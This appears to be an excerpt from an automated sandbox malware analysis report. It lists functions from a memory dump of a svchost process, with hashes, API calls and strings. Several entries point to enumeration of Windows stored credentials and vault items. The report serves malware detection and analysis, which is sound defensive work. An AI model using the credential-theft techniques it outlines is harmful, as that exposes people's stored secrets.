Instruction ID: ab024fca6fdc5f035dd06798704e14b92e4b6745333b0a564bf85bba263a41a3
Opcode Fuzzy Hash: ab7ccd4069f1f1d76e138a0572d8fddb82c9da350596917f6e248f2e94dc8949
Instruction Fuzzy Hash: 93A18E72704A488AF7A2CF35D8427DD37A4B7487E8F408215EE6A57AD9DF74CA09D340

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800C7010, Relevance: 7.6, APIs: 5, Instructions: 114
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 00000001800C7132

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 8747f84f94c1001abb4fe0503701c113057734f863ca4b4f8debffb835009b3a
Instruction ID: 10c365aa8671a961d9eb61b50b25cfba2040059ab37d779a13e2ebfd42e17e6e
Opcode Fuzzy Hash: 8747f84f94c1001abb4fe0503701c113057734f863ca4b4f8debffb835009b3a
Instruction Fuzzy Hash: AF410272315B4881FAA78B1AA8043D56392BB5DBE0F0DC625BE5D4B785EE78C64C8340

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800933D8, Relevance: 7.6, APIs: 5, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 0000000180093428
SleepEx.KERNEL32 ref: 000000018009343B
SetCurrentDirectoryA.KERNEL32 ref: 00000001800934B0
SetCurrentDirectoryA.KERNEL32 ref: 000000018009350B
RevertToSelf.ADVAPI32 ref: 0000000180093516

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: CurrentDirectorySleep$RevertSelf
String ID:
API String ID: 2264410758-0
Opcode ID: f7c71c2221951e67c2e5059d0194fb29c21a90a5bdd269ca9e6ba30d6a355532
Instruction ID: 0929dd7122d473e4f257373cc6970a1c8ffe9941bbefa44b55b987ee2ebc5a5a
Opcode Fuzzy Hash: f7c71c2221951e67c2e5059d0194fb29c21a90a5bdd269ca9e6ba30d6a355532
Instruction Fuzzy Hash: 0D318A3070568842FFBBA731A4467ED2691AB8D7D0F58C428AC4E477DADE2DDB49CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180097760, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000180096D20: LoadLibraryExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180097784), ref: 0000000180096D48

wnsprintfA.SHLWAPI ref: 0000000180097885

Strings

VaultOpenVault(): %ld, xrefs: 00000001800978F8
VaultEnumerateItems(): %ld, xrefs: 00000001800978EF
%S|%S|%S, xrefs: 0000000180097874

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: LibraryLoadwnsprintf
String ID: %S|%S|%S$VaultEnumerateItems(): %ld$VaultOpenVault(): %ld
API String ID: 2832777074-2127485177
Opcode ID: 977e8299b9223c7264caefdb3f71e4174ac0a6ee6d03e75b327c959b37b1e329
Instruction ID: cf5e06c422770478dd719fb2fd12860c09b8a9f8a69b0402a32e69e6119eb143
Opcode Fuzzy Hash: 977e8299b9223c7264caefdb3f71e4174ac0a6ee6d03e75b327c959b37b1e329
Instruction Fuzzy Hash: 27418032300A8995EBB69F64D8543EA2360F7887D8F409126FB5E46ADADE34C74EC740

Uniqueness

Uniqueness Score: -1.00%

Function 000000018007ACB0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 162COMMON

Download Yara Rule

APIs

ObtainUserAgentString.URLMON ref: 000000018007AD1D

Strings

*/*, xrefs: 000000018007ADAE, 000000018007ADCC
', xrefs: 000000018007AE2F

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: '$*/*
API String ID: 2681117516-1726877421
Opcode ID: 45bc8136859e2d63bf0918b72fd8688a8dd4a94a1dc34803305670ebe6de5fd9
Instruction ID: ac416c9372b36cfd7d747851dab33469305c795da74abac2d8050efdc92de76f
Opcode Fuzzy Hash: 45bc8136859e2d63bf0918b72fd8688a8dd4a94a1dc34803305670ebe6de5fd9
Instruction Fuzzy Hash: FE61D8322086C485E776CB3991407DE7BA1F34ABD8F148615EB994B69ACF3DC74AC704

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000AEA4, Relevance: 4.6, APIs: 3, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 000000018000AECD
VirtualAlloc.KERNEL32 ref: 000000018000AEED
VirtualFree.KERNELBASE ref: 000000018000AF2A

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: Virtual$AllocFreeQuery
String ID:
API String ID: 3431888904-0
Opcode ID: c608af2ed7089043d48e8a49eb387f84fd9cada0d29b6f545213a9ff332b7481
Instruction ID: 3fb27ce0b217e004825480ae14c1ae5b87c20d9ff42810e0de6fedce3eb1670c
Opcode Fuzzy Hash: c608af2ed7089043d48e8a49eb387f84fd9cada0d29b6f545213a9ff332b7481
Instruction Fuzzy Hash: 5A11E572315B5986FE9ADF56A5103A9B691EF49FC0F48C034FE0903B54DF38DA498740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180011E24, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 86fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 0000000180011ED1

Strings

winRead, xrefs: 0000000180011F06

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: FileRead
String ID: winRead
API String ID: 2738559852-2759563040
Opcode ID: 8c247e15f4b1d17ce0c1b5db53209c59850548b62f6799824b59d53d60e956d8
Instruction ID: f7ebf1c72d111e0589bd77b0702d1e70cebcd0a70f026d21f15ea802020686d2
Opcode Fuzzy Hash: 8c247e15f4b1d17ce0c1b5db53209c59850548b62f6799824b59d53d60e956d8
Instruction Fuzzy Hash: 9831A532314A498AE7659F65D4407E967A1F78C7C9F508021FE4D43BAADF38C64EC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180011D94, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 0000000180011DB3

Strings

winClose, xrefs: 0000000180011DF3

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: CloseHandle
String ID: winClose
API String ID: 2962429428-4219828513
Opcode ID: b268e528cd751c0b2fad7bc94fdb1e88a9045d4238244d7657ccc099bd2aad8c
Instruction ID: b6257c9d07a22a2fefd1b52129c1a4d93fbe0a3b506b15f6216ae77530d8606d
Opcode Fuzzy Hash: b268e528cd751c0b2fad7bc94fdb1e88a9045d4238244d7657ccc099bd2aad8c
Instruction Fuzzy Hash: 07019E35704F0997E7869BA5E8443D962A4F74CBD1F048035EA8983691DF74CA698300

Uniqueness

Uniqueness Score: -1.00%

Function 00060000, Relevance: 1.7, APIs: 1, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000024.00000002.56181059142.0000000000060000.00000040.00000001.sdmp, Offset: 00060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_60000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8abb160697489a7eeb6c140f02747ef8463fea359f6955e90109cc26f3d67e02
Instruction ID: 38f26f01f6d9143f62faf5dfda428a33bee09e2d8908a00fa6f45a3e073ebd44
Opcode Fuzzy Hash: 8abb160697489a7eeb6c140f02747ef8463fea359f6955e90109cc26f3d67e02
Instruction Fuzzy Hash: F751EE74258E088FDBA8EF19C495E27B7E2FF99310B514A9DD09BC7665C730E841CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800A9F80, Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

ProcessIdToSessionId.KERNEL32 ref: 00000001800A9FBB

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: ProcessSession
String ID:
API String ID: 3779259828-0
Opcode ID: 90ef7ce1f8b2da897055f06c3bee5f939f9b46e5ae7f682f0daca1db6a2f5462
Instruction ID: 589d7ff8adf536e157c982742a612f481da66f6371fa76c5ec517b63a11b336e
Opcode Fuzzy Hash: 90ef7ce1f8b2da897055f06c3bee5f939f9b46e5ae7f682f0daca1db6a2f5462
Instruction Fuzzy Hash: 8BE0123171868486D7649B10E44474B7770F3C53C4F508628FA8947B98CF7DC6958B00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000AE70, Relevance: 1.3, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE ref: 000000018000AE81

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: f3e2e5e7661c8cd3f8706676f60b1a1cf7c73fc1291fe6981e19e027ec7e886e
Instruction ID: 017fd305aaae715a18228f1fa8b46be059fc0f0f8c861c2b0af5d2174b45abe4
Opcode Fuzzy Hash: f3e2e5e7661c8cd3f8706676f60b1a1cf7c73fc1291fe6981e19e027ec7e886e
Instruction Fuzzy Hash: 3EB09224F2B9858AFADEA757884135421526F8EB86F94C114A909006548D2C03AF0B10

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 000000018000100C, Relevance: 81.9, APIs: 41, Strings: 1, Instructions: 8415COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A6C5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A6CB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A6D1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A6D7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A6DD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A6E3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A6E9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A6EF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A6F5
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A6FB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A701
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A707
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A70D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A713
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A719
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A71F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A725
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A72B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A731
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A737
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A73D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A743
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A749
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A74F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A755
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A75B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A761
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A767
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A76D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A773
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A779
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A77F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A785
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A78B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A791
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A797
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A79D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A7A3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A7A9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A7AF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 000000018000A7B5

Part of subcall function 0000000180074AF4: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 0000000180074B49

Part of subcall function 00000001800B44B4: _onexit.LIBCMT ref: 00000001800B44B8

Strings

/, xrefs: 0000000180004423

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$_onexit
String ID: /
API String ID: 2719931919-2043925204
Opcode ID: c81e1dfef0274af9840e3ceddf79133ba9fa12a4f70735e518a1fefeaef61505
Instruction ID: c38a11b1e59d2737c66de5b8e983652ed781ef50294992bd44e64cdf5de9e4e0
Opcode Fuzzy Hash: c81e1dfef0274af9840e3ceddf79133ba9fa12a4f70735e518a1fefeaef61505
Instruction Fuzzy Hash: AE141C6321A6C08ED372DF7C88847DE3FA1E76634CF048159D3844FA8BCA69975AC716

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800AA078, Relevance: 71.0, APIs: 20, Strings: 20, Instructions: 982stringCOMMON

Download Yara Rule

APIs

IsCharAlphaNumericW.USER32 ref: 00000001800AA0EF
IsTextUnicode.ADVAPI32 ref: 00000001800AA103
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800AA246
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800AA24C
CredEnumerateA.ADVAPI32 ref: 00000001800AA2B7
AuditFree.ADVAPI32 ref: 00000001800AA964
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800AA9DC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800AA9E2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800AA9E8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800AA9EE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800AA9F4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800AA9FA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00000001800AAA00
GetClassNameA.USER32 ref: 00000001800AAA3D
lstrcmp.KERNEL32 ref: 00000001800AAAC9

Strings

L, xrefs: 00000001800AAA95
d, xrefs: 00000001800AAD50
l, xrefs: 00000001800AAD41
d, xrefs: 00000001800AAD37
}, xrefs: 00000001800AAD64
>, xrefs: 00000001800AAAD7
G, xrefs: 00000001800AAA9A
x, xrefs: 00000001800AAC94
s, xrefs: 00000001800AAD5F
h, xrefs: 00000001800AAC8A
`, xrefs: 00000001800AAD3C
h, xrefs: 00000001800AAD4B
m, xrefs: 00000001800AAC8F
#, xrefs: 00000001800AAA90
W, xrefs: 00000001800AABEA
w, xrefs: 00000001800AAD46
v, xrefs: 00000001800AAD55
u, xrefs: 00000001800AAD32
d, xrefs: 00000001800AAD5A
I, xrefs: 00000001800AAC85

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$AlphaAuditCharClassCredEnumerateFreeNameNumericTextUnicodelstrcmp
String ID: #$>$G$I$L$W$`$d$d$d$h$h$l$m$s$u$v$w$x$}
API String ID: 1906179564-1916785858
Opcode ID: 741d87d6a8de9cc1615eb27fb8612f55b1c1a430edde73b241737d9dd553d81f
Instruction ID: 63b332a588499fc91a3e19e06cbab4d19995b85e4eacca7820ae6afbad2ebb5f
Opcode Fuzzy Hash: 741d87d6a8de9cc1615eb27fb8612f55b1c1a430edde73b241737d9dd553d81f
Instruction Fuzzy Hash: 6A92E3736186C489FB51CB78D4443DE6B61E39A7E8F148305FAA917ADADF38C689C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000E070, Relevance: 13.7, Strings: 10, Instructions: 1166COMMONLIBRARYCODE

Download Yara Rule

Strings

gfff, xrefs: 000000018000E9F3
VUUU, xrefs: 000000018000ED59
Inf, xrefs: 000000018000E7EB
VUUU, xrefs: 000000018000EE63
NULL, xrefs: 000000018000EB46
0123456789ABCDEF0123456789abcdef, xrefs: 000000018000E9A7, 000000018000EE07
NaN, xrefs: 000000018000EA9F
-x0, xrefs: 000000018000EECF
thstndrd, xrefs: 000000018000EDE8
(NULL), xrefs: 000000018000EB4D

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID:
String ID: (NULL)$-x0$0123456789ABCDEF0123456789abcdef$Inf$NULL$NaN$VUUU$VUUU$gfff$thstndrd
API String ID: 0-3991615892
Opcode ID: fdd5e5d607ed22b09f960c9211102d641fb2c4aa01efccf560bf9e5c3ef5628b
Instruction ID: 4ddcb77c3e228d464fb316d3a6c1c2e911e6c98ecb18731da34700fc38e629f5
Opcode Fuzzy Hash: fdd5e5d607ed22b09f960c9211102d641fb2c4aa01efccf560bf9e5c3ef5628b
Instruction Fuzzy Hash: 34A20332608AC885E7B7CA2494543EE7BA1E75F7C4F19C215FA8A23795DF39CA49C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800BA050, Relevance: 9.2, APIs: 6, Instructions: 240COMMON

Download Yara Rule

APIs

Part of subcall function 00000001800B9EA8: RtlExitUserThread.NTDLL(?,?,?,00000001800BA059,?,?,?,?,000000018000F77F), ref: 00000001800B9EC0
Part of subcall function 00000001800B9EA8: RtlExitUserThread.NTDLL(?,?,?,00000001800BA059,?,?,?,?,000000018000F77F), ref: 00000001800B9ED5
Part of subcall function 00000001800B9EA8: CloseHandle.KERNEL32 ref: 00000001800B9EF5
Part of subcall function 00000001800B9EA8: FreeLibraryAndExitThread.KERNEL32(?,?,?,00000001800BA059,?,?,?,?,000000018000F77F), ref: 00000001800B9F0B
Part of subcall function 00000001800B9EA8: RtlExitUserThread.NTDLL(?,?,?,00000001800BA059,?,?,?,?,000000018000F77F), ref: 00000001800B9F14

_invalid_parameter_noinfo.LIBCMT ref: 00000001800BA07E
_get_daylight.LIBCMT ref: 00000001800BA0DA
_get_daylight.LIBCMT ref: 00000001800BA0EB
_get_daylight.LIBCMT ref: 00000001800BA0FC
_isindst.LIBCMT ref: 00000001800BA14D
_isindst.LIBCMT ref: 00000001800BA1A0

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: ExitThread$User_get_daylight$_isindst$CloseFreeHandleLibrary_invalid_parameter_noinfo
String ID:
API String ID: 3239875647-0
Opcode ID: b9140425bd08610bf56c0ffe172fc409baa054d480cd647dd7f16f76ddd46ae0
Instruction ID: 8170a9897ea57d69b07747b2a189c9168a039921270507fe808bf81ca8913017
Opcode Fuzzy Hash: b9140425bd08610bf56c0ffe172fc409baa054d480cd647dd7f16f76ddd46ae0
Instruction Fuzzy Hash: 7A91D87270464D4BFB999F79C9613E923A1E7597C8F44C025FB098AB86EF38D6088740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180050FF8, Relevance: 3.1, Strings: 2, Instructions: 628COMMON

Download Yara Rule

Strings

BINARY, xrefs: 0000000180051779
h, xrefs: 0000000180051450

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID:
String ID: BINARY$h
API String ID: 0-1059121772
Opcode ID: 197c95c973d26e8d3cc34e86a58e6955c46ea9eec5620e00232dd5c005364b6c
Instruction ID: 44082fc9a24ad5257b3e8b41e279db6c6ad90b6b1599da61e254238e4e0ef7ba
Opcode Fuzzy Hash: 197c95c973d26e8d3cc34e86a58e6955c46ea9eec5620e00232dd5c005364b6c
Instruction Fuzzy Hash: 0542B0363056888AEBE2DB26E150BEA77A5F79CBC4F009115FE4553B99DF39D608CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180063038, Relevance: 45.8, APIs: 7, Strings: 19, Instructions: 255COMMON

Download Yara Rule

APIs

_cwprintf_s_l.LIBCMT ref: 0000000180063145
_cwprintf_s_l.LIBCMT ref: 0000000180063158
_cwprintf_s_l.LIBCMT ref: 0000000180063173
_cwprintf_s_l.LIBCMT ref: 000000018006320E
_cwprintf_s_l.LIBCMT ref: 00000001800632D0
_cwprintf_s_l.LIBCMT ref: 00000001800633AD
_cwprintf_s_l.LIBCMT ref: 00000001800633CE

Strings

USING , xrefs: 00000001800631F1
AND , xrefs: 00000001800632A3
SEARCH, xrefs: 00000001800630DC
TABLE %s, xrefs: 0000000180063151
INDEX %s, xrefs: 00000001800631DB
AUTOMATIC COVERING INDEX, xrefs: 00000001800631C4
USING INTEGER PRIMARY KEY (rowid%s?), xrefs: 00000001800633A1
VIRTUAL TABLE INDEX %d:%s, xrefs: 00000001800633BE
<expr>, xrefs: 000000018006326E
%s=?, xrefs: 00000001800632B4
SCAN, xrefs: 00000001800630E7
AS %s, xrefs: 0000000180063167
PRIMARY KEY, xrefs: 00000001800631A0
ANY(%s), xrefs: 00000001800632BD
COVERING INDEX %s, xrefs: 00000001800631D2
AUTOMATIC PARTIAL COVERING INDEX, xrefs: 00000001800631B5
SUBQUERY %d, xrefs: 000000018006313E
>? AND rowid<, xrefs: 0000000180063380
rowid, xrefs: 000000018006327C

Memory Dump Source

Source File: 00000024.00000002.56183122663.0000000180001000.00000020.00000001.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000024.00000002.56183109710.0000000180000000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183307607.00000001800DA000.00000002.00000001.sdmp Download File
Associated: 00000024.00000002.56183370303.0000000180107000.00000004.00000001.sdmp Download File
Associated: 00000024.00000002.56183400870.000000018010D000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_180000000_svchost.jbxd

Similarity

API ID: _cwprintf_s_l
String ID: AND $ AS %s$ SUBQUERY %d$ TABLE %s$ USING $ USING INTEGER PRIMARY KEY (rowid%s?)$ VIRTUAL TABLE INDEX %d:%s$%s=?$<expr>$>? AND rowid<$ANY(%s)$AUTOMATIC COVERING INDEX$AUTOMATIC PARTIAL COVERING INDEX$COVERING INDEX %s$INDEX %s$PRIMARY KEY$SCAN$SEARCH$rowid
API String ID: 2941638530-2362551737
Opcode ID: cba452b53a93e36205f25bd0e53df2685e14e60261d80f694b9f362a591f289f
Instruction ID: abff2aafe40699022adb5dc2349e9d2c797e5ed7e0e3b493b9715c260525673f
Opcode Fuzzy Hash: cba452b53a93e36205f25bd0e53df2685e14e60261d80f694b9f362a591f289f
Instruction Fuzzy Hash: 07C1CA32214B4882EAA2DB15E8417E973A2F7497D4F608216FE6A4BBD4DF38C70DC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180095048, Relevance: 7.7, APIs: 5, Instructions: 213stringmemoryCOMMON

Download Yara Rule

